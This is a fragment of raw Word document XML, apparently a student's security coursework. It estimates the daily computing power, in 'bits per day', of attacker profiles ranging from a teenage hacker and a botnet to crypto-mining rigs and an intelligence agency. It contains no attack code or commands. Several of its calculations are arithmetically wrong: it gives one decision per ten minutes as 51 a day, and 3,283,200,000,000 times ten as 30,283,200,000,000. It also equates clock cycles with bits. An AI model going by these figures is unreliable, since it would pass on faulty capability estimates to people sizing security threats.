          <w:p w14:paraId="41AE5F47" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="11B66F3E" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Whilst the office worker has more CPU power, they are being supervised so will be mostly limited by their own time constraints: Hence they are only capable of making 1 decision every 10 minutes. Hence, 51 per 24 Hours.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED64B28" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327D3F5F" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B73AE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Solo Teenage Hacker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330E8282" w14:textId="77777777" w:rsidR="00163D99" w:rsidRPr="00163D99" w:rsidRDefault="003A4F61" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>I am assuming that this person will spend approximately 75%</w:t>
            </w:r>
            <w:r w:rsidR="004D16C5">
              <w:t xml:space="preserve"> ($7.5k)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of their available funds on the PC equipment. And then the remaining will be on training, skills development and tools. </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t xml:space="preserve"> I am assuming by this they will have th</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve">e </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t>computer mostly dedicated or almost full utilisation</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve"> and under the assumption they are only using a nominal computer elements such as a GPU and/or CPU but not HPC grade components.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70723FD5" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRPr="00717063" w:rsidRDefault="00163D99" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00717063">
              <w:t>Get something similar to a pretty well upgraded Lenovo P3 Tower- But doesn’t know how to use GPU but can make it multithreaded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6B792B" w14:textId="77777777" w:rsidR="00EB538C" w:rsidRPr="00EB538C" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>24threads×5.7GHz×24</m:t>
              </m:r>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>hours≈</m:t>
              </m:r>
              <m:f>
                <m:fPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:fPr>
                <m:num>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>3,283,200,000,000bits</m:t>
                  </m:r>
                </m:num>
                <m:den>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>day</m:t>
                  </m:r>
                </m:den>
              </m:f>
            </m:oMath>
          </w:p>
          <w:p w14:paraId="742B561C" w14:textId="77777777" w:rsidR="00EB538C" w:rsidRDefault="003317F4" w:rsidP="00EB538C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003317F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Small Business Hacking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F60E685" w14:textId="77777777" w:rsidR="003317F4" w:rsidRDefault="000B00DE" w:rsidP="00473801">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000B00DE">
              <w:t>Assuming</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> this business has the resources for 10 people/PCs to simultaneously run through the processes and they are all equivalent to a Lenovo workstation and then have to utilise the 100K for the compute and the infrastructure costs of their network. They will be able to achieve 10 times more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519E7431" w14:textId="709DFD88" w:rsidR="000B00DE" w:rsidRDefault="000B00DE" w:rsidP="000B00DE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Hence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516FFCE4" w14:textId="01BDBF3A" w:rsidR="006576AD" w:rsidRDefault="00000000" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>3,283,200,000,000bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>×10≈</m:t>
                </m:r>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>30,283,200,000,000bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="72EB9F6C" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006576AD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Large Organisation Hacking :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3B7F08" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> A large organisation will likely implement a HPC with that budget in a server rack form</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEF9105" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006576AD">
              <w:t>I found a moderately setup rack with 2xAMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W) per unit for $75-100k so they could</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>impl</w:t>
            </w:r>
            <w:r w:rsidR="00105939">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>ment about 18 when you then account for other infrastructure costs</w:t>
            </w:r>
            <w:r w:rsidR="008A7E74">
              <w:t>. Assuming each core is in full utilisation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C07CC6C" w14:textId="77777777" w:rsidR="008A7E74" w:rsidRPr="008B59EF" w:rsidRDefault="008A7E74" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>≈18×2×32×3.55×</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4,089,600,000,000 bits/second</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="0AB88AA9" w14:textId="77777777" w:rsidR="008B59EF" w:rsidRPr="00553FBC" w:rsidRDefault="008B59EF" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>24×4,089,600,000,000= 98,150,400,000,000 per day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="3D6090E6" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="367CBC45" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="00553FBC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00553FBC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Large Botnet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648D88F5" w14:textId="77777777" w:rsidR="00FA64B7" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming 5 million devices of the office workers device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E55A46E" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The 25 Million dollar budget is to maintain exploitation services and infrastructure to command the bot net.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A811074" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00E05570" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hence using the office worker PC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D67C23" w14:textId="77777777" w:rsidR="00E05570" w:rsidRPr="00831FB7" w:rsidRDefault="00B9509C" w:rsidP="00E05570">
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>5000000×6×4.7×</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×≈3.384×</m:t>
              </m:r>
              <m:sSup>
                <m:sSupPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:sSupPr>
                <m:e>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>10</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>18</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t xml:space="preserve">bits/day </m:t>
              </m:r>
            </m:oMath>
            <w:commentRangeEnd w:id="1"/>
            <w:r w:rsidR="005A08DC" w:rsidRPr="00831FB7">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="1"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A6BC63" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00E05570">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00831FB7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Crypto Miner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F456CC0" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming the hardware can compute per second the same as its hash rates, ignoring the differences that may lie within the ASIC algorithm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6D1BAD" w14:textId="77777777" w:rsidR="00B55423" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hardware costs 10k each and is a normal device hence with the budget there are 5000 devices</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F6881D" w14:textId="54890C09" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>5000×270×</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×24×3600≈</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>1.1664x</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>23</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>bits/day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="37FBCA32" w14:textId="64EA650B" w:rsidR="00B55423" w:rsidRDefault="00433997" w:rsidP="00B55423">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00433997">
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Foreign Intelligence Agency:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E72CB05" w14:textId="3D6BDD47" w:rsidR="00FB0A49" w:rsidRDefault="0018464D" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
            </w:r>
            <w:r w:rsidR="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDE11F6" w14:textId="355B5199" w:rsidR="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">However from research around NSA sites currently the estimated compute power is approximately 2 exaflops </w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">with at least 2 of these type of super computing facilities: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>as assuming they are</w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve"> only need on floating point operation for each decision/key calculation [Large Bit Width Processing :O]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440F11A5" w14:textId="66550993" w:rsidR="00A90EF5" w:rsidRPr="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00A90EF5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>2×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:i/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>18</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>×24×3600≈3.456×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:i/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>23</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>bits/day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="096B6636" w14:textId="41C2D541" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="283B9BD1" w14:textId="4FA87121" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACDB6C8" w14:textId="5B4BAFC5" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="1F220764" w14:textId="3D846552" w:rsidR="53506ABB" w:rsidRPr="00ED5F6D" w:rsidRDefault="53506ABB" w:rsidP="42E83AC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E80F83" w14:textId="3F314CDE" w:rsidR="53506ABB" w:rsidRPr="00ED5F6D" w:rsidRDefault="53506ABB" w:rsidP="42E83AC9">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="160" w:after="80"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>Week 3 Extension Wargames</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w14:paraId="5D6C77EB" w14:textId="77777777" w:rsidTr="42E83AC9">
        <w:trPr>
